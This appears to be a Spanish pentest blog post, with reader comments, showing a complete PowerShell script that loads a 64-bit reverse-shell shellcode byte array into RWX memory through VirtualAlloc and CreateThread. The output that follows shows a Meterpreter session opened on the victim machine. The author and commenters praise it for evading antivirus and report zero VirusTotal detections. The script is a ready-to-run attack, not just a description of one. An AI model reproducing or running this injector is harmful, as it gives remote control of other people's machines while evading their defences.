# Importa las funciones requeridas (VirtualAlloc, CreateThread y memset)
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
';

# Añade el código CSharp como una clase reconocida por Powershell
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];

# Añade el payload de 64 bits (/pentest/exploits/set/src/powershell/reverse.powershell) como byte array
[Byte[]]$sc64 = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x01,0xbb,0xc0,0xa8,0xf9,0x80,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,0xe7;

# Determina que Powershell esta ejecutándose en 64 bits
[Byte[]]$sc = $sc64;

# Calcula el tamaño correcto para VirtualAlloc
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};

# Asigna una página de memoria. Esto sólo funcionará si el parámetro de tamaño (tercer parámetro) es al menos 0x1000.
# Asigna un bloque de memoria RWX
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);

# Copia el shellcode a la región de memoria ejecutable
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

# Ejecuta el shellcode en su propio hilo
$winFunc::CreateThread(0,0,$x,0,0,0);

# zzz...
for (;;) { Start-sleep 60 };
Ahora sólo falta ejecutarlo en la máquina de la víctima...
[*] Sending stage (951296 bytes) to 192.168.249.1
[*] Meterpreter session 1 opened (192.168.249.128:443 -> 192.168.249.1:57165) at 2012-11-26 08:31:15 -0500
meterpreter > getuid
Server username: PANDORA\vmotos
y.. toc, toc... obtenemos una sesión de Meterpreter sin que el AV se haya inmutado :D 

No es un método nuevo, pero sigue siendo efectivo y con SET es sumamente sencillo ejecutarlo. No obstante, si queréis ahondar un poco más en la post-explotación de escenarios con Powershell, os recomendamos que echéis un vistazo a PowerSploit. En este proyecto encontraréis un 'Inject-Shellcode.ps1' mejorado y otros scripts que seguro os serán muy útiles durante un pentest. 

Fuentes: 
Exploiting Powershell's Features (Not Flaws)  
Social Engineering Toolkit: Bypassing Anti-Virus using Powershell

2 comentarios :

  1. Estoy probando este ataque con un Windows 7 Home Peemium sin actualizar de hace tiempo, pero con Security Essentials de Microsoft y lo detecta el AV del tirón..

    ResponderEliminar
  2. ummm interesante, yo lo he probado en un Win7 pro con McAfee y en un Win Home Premium con AVG y se ha ejecutado como si nada...

    También subí el fichero .ps1 y con 0% detecciones:

    https://www.virustotal.com/file/8285ee571bf719d2325cfb8d2eae3c766af4d3b23e7a6f191cc3b17cd6656da4/analysis/1354146062/

    ¿Cómo detecta M$ Essentials el powershell? Me refierto, ¿lo bautiza ya como una familia de malware (firma)?¿heurística?

    ResponderEliminar